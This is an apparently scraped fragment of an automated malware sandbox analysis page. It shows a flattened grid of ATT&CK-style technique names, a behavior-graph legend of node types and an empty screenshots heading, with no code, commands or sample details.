IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.